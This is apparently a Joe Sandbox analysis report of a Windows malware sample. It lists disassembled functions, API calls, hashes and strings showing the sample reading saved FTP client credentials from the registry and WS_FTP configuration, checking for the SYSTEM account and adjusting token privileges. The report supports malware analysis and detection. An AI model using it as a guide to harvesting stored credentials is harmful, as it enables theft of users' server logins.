                  • Instruction Fuzzy Hash: 3D31FDB0900219AADF21AB61CC41EEEB7B9AF44304F0045BBBA18B51F1D7799ED19F58
                  Function 0040A457 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.OLE32(004131CB,00000000,00000005,004131DB,?), ref: 0040A46F
                  • StrStrIW.SHLWAPI(00000000,004131FB), ref: 0040A4E6
                  • CoTaskMemFree.OLE32(00000000,00000000,004131FB), ref: 0040A511
                  • CoTaskMemFree.OLE32(00000000,00000000,00000000,004131FB), ref: 0040A51F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeTask$CreateInstance
                  • String ID: ($http://www.facebook.com/
                  • API String ID: 2903366249-3677894361
                  • Opcode ID: b166dd6a5ce2f70902b6da10580f869f0ae24ff8d6d8124b56e15d65d62aef3d
                  • Instruction ID: 432045e52bd66d4fe49fde4f2c870db2b10b178aa535912c656550905345e8ea
                  • Opcode Fuzzy Hash: b166dd6a5ce2f70902b6da10580f869f0ae24ff8d6d8124b56e15d65d62aef3d
                  • Instruction Fuzzy Hash: D831F731A00209FBDF119F90DC49BDEBBB5BF08308F248166E500B6290D7B99AD5DB59
                  Function 0040273D Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00402778
                  • GetCurrentProcess.KERNEL32 ref: 00402782
                  • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402790
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004027D2
                  • CloseHandle.KERNEL32(00000000), ref: 004027E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                  • String ID:
                  • API String ID: 3038321057-0
                  • Opcode ID: 9e21f3fd3e68ce677e23c3b55d49d999316dbdf05d850c254425d8fa8ea8784b
                  • Instruction ID: 8b23b7d22403577f927a3a331623c1ec88f7fce9aa05f6b36c9706ca18c0f2cc
                  • Opcode Fuzzy Hash: 9e21f3fd3e68ce677e23c3b55d49d999316dbdf05d850c254425d8fa8ea8784b
                  • Instruction Fuzzy Hash: 0611213591010AEFEF119B94DD4DBEEBBB5BB04344F108536A111B55E0D7F84A44CB59
                  Function 0040FE97 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                  Download Yara Rule
                  APIs
                  • OleInitialize.OLE32 ref: 0040FE97
                  • GetUserNameA.ADVAPI32(?,00000101), ref: 0040FEE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeNameUser
                  • String ID:
                  • API String ID: 2272643758-0
                  • Opcode ID: bbeb51275df44be299aa57c46db9fa5abcaf4f97a742a1450cd261d66885c8cc
                  • Instruction ID: e26f2e66d9dcda26697d7491d2630af3795e62fece7ce76a808f27638715b85c
                  • Opcode Fuzzy Hash: bbeb51275df44be299aa57c46db9fa5abcaf4f97a742a1450cd261d66885c8cc
                  • Instruction Fuzzy Hash: ECF01C70654201A9CB20BBB2D906ADC39A5AB0038CF10447FB500B19F3EBFD44849A6D
                  Function 0040FF45 Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0040FF45
                  • RevertToSelf.ADVAPI32 ref: 0040FF6B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterRevertSelfUnhandled
                  • String ID:
                  • API String ID: 669012916-0
                  • Opcode ID: 204b044f3cc013be6c6188bff45fc5f4e677cf5a7f2a8a70e96d9e0d528a0934
                  • Instruction ID: 1ef4db78a8eeff073eebb63f225d7f1ff4716855c3f03a9c52e7af2739d389e1
                  • Opcode Fuzzy Hash: 204b044f3cc013be6c6188bff45fc5f4e677cf5a7f2a8a70e96d9e0d528a0934
                  • Instruction Fuzzy Hash: 05D0677418564189E631BBF3945A7CD3A606B0530DF54803FA64060DF3CFBE148DC9AE
                  Function 0040F566 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !AA
                  • API String ID: 0-779614855
                  • Opcode ID: c2242ef122f4b4731c008e401a651a78bd98daaf91efc53295796e22f2dbc53f
                  • Instruction ID: e439f24111ecda037a6ba224461d6446448cd6da93f758e11ff317597baed0f2
                  • Opcode Fuzzy Hash: c2242ef122f4b4731c008e401a651a78bd98daaf91efc53295796e22f2dbc53f
                  • Instruction Fuzzy Hash: DC118B35604284FFDB225F05DD01B967F65EB81B50F208877F80AA19F2C37E49A69A4D
                  Function 004055C1 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405661
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405691
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004056DF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                  • API String ID: 1332880857-44262141
                  • Opcode ID: bc12ebd6ed49e13805bbd51c7b93d4968f403f2a445392b3feca5043dfa8c3b2
                  • Instruction ID: 6256b6819b4c46cd2bc8a3c44f1df6facdaf933e4f51f1a6b866da70e3a32d03
                  • Opcode Fuzzy Hash: bc12ebd6ed49e13805bbd51c7b93d4968f403f2a445392b3feca5043dfa8c3b2
                  • Instruction Fuzzy Hash: ED21F83568020CBADF116A61CE42FDE7A65AB04B04F20C567B924B50E1DBFD5AE0AF5C
                  Function 00401E8E Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172registrystringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401EFB
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401F3B
                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00401FEE
                  • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402027
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 0040205E
                  • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 0040208A
                  • GlobalLock.KERNEL32(?), ref: 004020BA
                  • GlobalUnlock.KERNEL32(?), ref: 004020D9
                  • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 004020EB
                  • GlobalLock.KERNEL32(?), ref: 0040211B
                  • GlobalUnlock.KERNEL32(?), ref: 0040213A
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                  • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 4234118056-981893429
                  • Opcode ID: 10c08c6e89e0d03a55878e87c3fa188f42c1e7650d9481c1c75df394e4181a56
                  • Instruction ID: badc67223168fa67c5ee47ab51c24d6e14ff1f2165c540af953b6d676deb288d
                  • Opcode Fuzzy Hash: 10c08c6e89e0d03a55878e87c3fa188f42c1e7650d9481c1c75df394e4181a56
                  • Instruction Fuzzy Hash: 16614B74900168BADB31AB61CD46BEA7679EB04344F0040BBB688B11F1D7FD5EC4AE68
                  Function 004029D6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 358 4029d6-4029e7 359 4029e9 358->359 360 4029ea-4029f2 358->360 361 4029f4-4029fb 360->361 362 402a06-402a0a 360->362 361->362 363 4029fd-402a04 361->363 363->362 364 402a0b-402a21 GetCurrentProcess OpenProcessToken 363->364 365 402ab7-402abb 364->365 366 402a27-402a43 GetTokenInformation 364->366 367 402a45-402a4d GetLastError 366->367 368 402aaf-402ab2 CloseHandle 366->368 367->368 369 402a4f-402a53 367->369 368->365 369->368 370 402a55-402a77 call 401769 GetTokenInformation 369->370 373 402aa7-402aaa call 401752 370->373 374 402a79-402a8b ConvertSidToStringSidA 370->374 373->368 374->373 375 402a8d-402a9c lstrcmp 374->375 377 402a9e 375->377 378 402a9f-402aa2 LocalFree 375->378 377->378 378->373
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: S-1-5-18
                  • API String ID: 0-4289277601
                  • Opcode ID: 8e3158d1a93bde16ea37971c10a468597ac152d2a6ecb3ea59d04bf08c7c97c6
                  • Instruction ID: 36688ae97771a16eb0cbb91699016dc6f457bd45ac61167d36d0fc4b3f5269ed
                  • Opcode Fuzzy Hash: 8e3158d1a93bde16ea37971c10a468597ac152d2a6ecb3ea59d04bf08c7c97c6
                  • Instruction Fuzzy Hash: C5213D30B00209BEDF219BA5DD8ABEE7BB5AF01748F104476F101B15E1EBB99944DB58
                  Function 004062AC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 379 4062ac-4062c9 RegOpenKeyA 380 40652e-40652f 379->380 381 4062cf 379->381 382 4062d6-4062fd RegEnumKeyExA 381->382 383 406304-4063c2 call 401bcd call 401c21 call 401b46 * 5 382->383 384 4062ff-406529 RegCloseKey 382->384 400 4063c4-4063cb 383->400 401 4063d7 383->401 384->380 400->401 402 4063cd-4063d5 400->402 403 4063e1-406406 call 401752 call 401b46 401->403 402->403 408 406408-40640f 403->408 409 40641b 403->409 408->409 410 406411-406419 408->410 411 406425-406432 call 401752 409->411 410->411 414 406473-40647a 411->414 415 406434-40643b 411->415 416 4064e7-406521 call 401752 * 5 414->416 417 40647c-406483 414->417 415->414 418 40643d-406453 call 403ff9 415->418 416->382 417->416 420 406485-40648c 417->420 427 406455-40645c 418->427 428 40645e-406469 call 401752 418->428 420->416 423 40648e-4064e2 call 4014e6 call 401548 * 2 call 40151c call 4014e6 call 401548 420->423 423->416 427->414 427->428 428->414
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004062C2
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004062F6
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406529
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                  • API String ID: 1332880857-4069465341
                  • Opcode ID: 333cdb783cf6d04b105b3be37216fa7615c6c58f5be93e92b63bab62230026b0
                  • Instruction ID: f54a0b34a13648c7f2de88a23b550de72a796d31f471fcede32365af730f2905
                  • Opcode Fuzzy Hash: 333cdb783cf6d04b105b3be37216fa7615c6c58f5be93e92b63bab62230026b0
                  • Instruction Fuzzy Hash: 1E51D631940118EADF226F51DD41BE9BBB9BF04304F14C0BAB549750B1DBBA5EA1EF88
                  Function 0040CC54 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 448 40cc54-40cc6e RegOpenKeyA 449 40cc74 448->449 450 40cea9-40ceaa 448->450 451 40cc7b-40cca2 RegEnumKeyExA 449->451 452 40cca4-40cea4 RegCloseKey 451->452 453 40cca9-40cd40 call 401bcd * 2 call 401752 call 401b46 * 4 451->453 452->450 469 40cd42-40cd49 453->469 470 40cd5b-40cd5d 453->470 469->470 471 40cd4b-40cd59 call 401752 469->471 472 40cd65 470->472 473 40cd5f-40cd60 call 401752 470->473 476 40cd6f-40cdac call 401b46 * 2 471->476 472->476 473->472 482 40cdb2-40cdc8 call 403ff9 476->482 483 40ce46-40ce9c call 401752 * 5 call 40cc54 call 401752 476->483 482->483 488 40cdca-40cdce 482->488 483->451 488->483 490 40cdd0-40cdd7 488->490 490->483 492 40cdd9-40cde0 490->492 492->483 494 40cde2-40ce41 call 4014e6 call 401548 * 2 call 40151c call 4014e6 call 401548 * 2 492->494 494->483
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CC67
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CC9B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                  • API String ID: 1332880857-2649023343
                  • Opcode ID: 102501fe7d6983fb4ce4816fb803e742d1a2c4c47817e05f00dff8f142c619ea
                  • Instruction ID: 363f7e0d49be60193d8d738e401c9fb1663db730a6c144a8acea58420cec79c7
                  • Opcode Fuzzy Hash: 102501fe7d6983fb4ce4816fb803e742d1a2c4c47817e05f00dff8f142c619ea
                  • Instruction Fuzzy Hash: CE51C371800118FADF226F61CD82BDDBBB9BF04304F10C1BAB558750B1DB7A5A91AF98
                  Function 0040779C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 517 40779c-4077b6 RegOpenKeyA 518 4077bc 517->518 519 4079fe-4079ff 517->519 520 4077c3-4077ea RegEnumKeyExA 518->520 521 4077f1-4078a4 call 401bcd * 2 call 401752 call 401b46 * 5 520->521 522 4077ec-4079f9 RegCloseKey 520->522 540 4078a6-4078ad 521->540 541 4078bf-4078c1 521->541 522->519 540->541 542 4078af-4078bd call 401752 540->542 543 4078c3-4078c4 call 401752 541->543 544 4078c9 541->544 547 4078d3-4078fa call 401b46 542->547 543->544 544->547 551 407900-407907 547->551 552 40799b-4079f1 call 401752 * 5 call 40779c call 401752 547->552 551->552 553 40790d-407914 551->553 552->520 553->552 555 40791a-407974 call 4014e6 call 401548 * 3 call 4014e6 call 401548 553->555 581 407991-407996 call 4014e6 555->581 582 407976-40797d 555->582 581->552 582->581 583 40797f-40798f call 4014e6 582->583 583->552
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004077AF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004077E3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004079F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                  • API String ID: 1332880857-3874328862
                  • Opcode ID: 4a021aa840e134b11541bbb7fc7602dc1ba3e8ef8cc3bbf4944d3ea423132fef
                  • Instruction ID: 2510d6a40b605ee05c49857dae87127b44a85cf62aaf35441b724d9e07d5eb59
                  • Opcode Fuzzy Hash: 4a021aa840e134b11541bbb7fc7602dc1ba3e8ef8cc3bbf4944d3ea423132fef
                  • Instruction Fuzzy Hash: 5C51D57190411CEADF226F51CD42BDDBBB5BF04304F10C0BAB548750B2DBBA6A91AF89
                  Function 0040D844 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D857
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D88B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA74
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                  • API String ID: 1332880857-3620412361
                  • Opcode ID: a32b4bd4c164d7361dc0d4439a1349ca33acaaaa7ec1cf80291e72e22fe995e8
                  • Instruction ID: 90d5fe3b6cf1126b5e6c573dd5c1e4be20dc213f4b7a04e65ac77be63d2f89e1
                  • Opcode Fuzzy Hash: a32b4bd4c164d7361dc0d4439a1349ca33acaaaa7ec1cf80291e72e22fe995e8
                  • Instruction Fuzzy Hash: C4519571940118FBDF226F91CC42BDDBAB5BF04304F10C4BAB549750B1DB7A5AA59F88
                  Function 00407AEE Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407B01
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407B35
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407CFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                  • API String ID: 1332880857-2128033141
                  • Opcode ID: 5acf38d65e4bdc86f7d7c70c30d041cec79a463b2ff235d56f61567fe9a4ba08
                  • Instruction ID: 35a2c5012d915438295930f9c11e6a977943eca2b7189a6a68ac68a7359c4362
                  • Opcode Fuzzy Hash: 5acf38d65e4bdc86f7d7c70c30d041cec79a463b2ff235d56f61567fe9a4ba08
                  • Instruction Fuzzy Hash: 0251953194411CBADF226F51CD42BDDBBB5BF04304F10C0BAB559750B2DBBA5AA1AF88
                  Function 004024B2 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84registryfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 706 4024b2-4024d4 RegCreateKeyA 707 4024d6-4024ed RegSetValueExA 706->707 708 4024f8-4024fa 706->708 709 4024f0-4024f3 RegCloseKey 707->709 710 4024ef 707->710 711 402500-402513 GetTempPathA 708->711 712 4025c5-4025c9 708->712 709->708 710->709 711->712 713 402519-40251e 711->713 713->712 714 402524-402540 CreateDirectoryA call 40237e 713->714 717 402542-40255c call 401bcd call 401c21 714->717 718 40255e-402568 call 401bcd 714->718 721 40256d-402591 ExitProcess 717->721 718->721 723 402593-4025a6 call 401422 CloseHandle 721->723 724 4025ab-4025ad 721->724 723->724 727 4025ba-4025c0 call 401752 724->727 728 4025af-4025b5 DeleteFileA 724->728 727->712 728->727
                  APIs
                  • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004024CD
                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 004024E6
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 004024F3
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040250C
                  • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040252D
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402588
                  • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025A6
                  • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                  • String ID: Software\WinRAR
                  • API String ID: 2428708885-224198155
                  • Opcode ID: b7997a29f9ee12ea2c8683bdef5b38ffdcc73321be99e554f2081b4ec90afc21
                  • Instruction ID: 37bae476364215f7a376405172e95ff0b3e620823ab204ba3b78da35b93a11c1
                  • Opcode Fuzzy Hash: b7997a29f9ee12ea2c8683bdef5b38ffdcc73321be99e554f2081b4ec90afc21
                  • Instruction Fuzzy Hash: 5C216D3191020DBADF21ABE1CD46FDD7A79AB14748F104476B604B50E1E6F99B909B1C
                  Function 00404C68 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404C8C
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00411805,?,00000104,?), ref: 00404CDC
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00411805,?,00000104,?), ref: 00404D17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                  • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                  • API String ID: 2508676433-45949541
                  • Opcode ID: b48a19c3fedec4f26597234550fce3125c583f965fd7da7918b0654d8a73ed6f
                  • Instruction ID: 833972c600fc57ce649323aa9ebf1fa4e87c99d79a78d52b417d9e2bfeec2045
                  • Opcode Fuzzy Hash: b48a19c3fedec4f26597234550fce3125c583f965fd7da7918b0654d8a73ed6f
                  • Instruction Fuzzy Hash: E92125B0A8020CBADF21BAA1CD43FD93D699B48744F100577B748B51E2D6F88ED09A6D
                  Function 0040E5DB Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E5FE
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E632
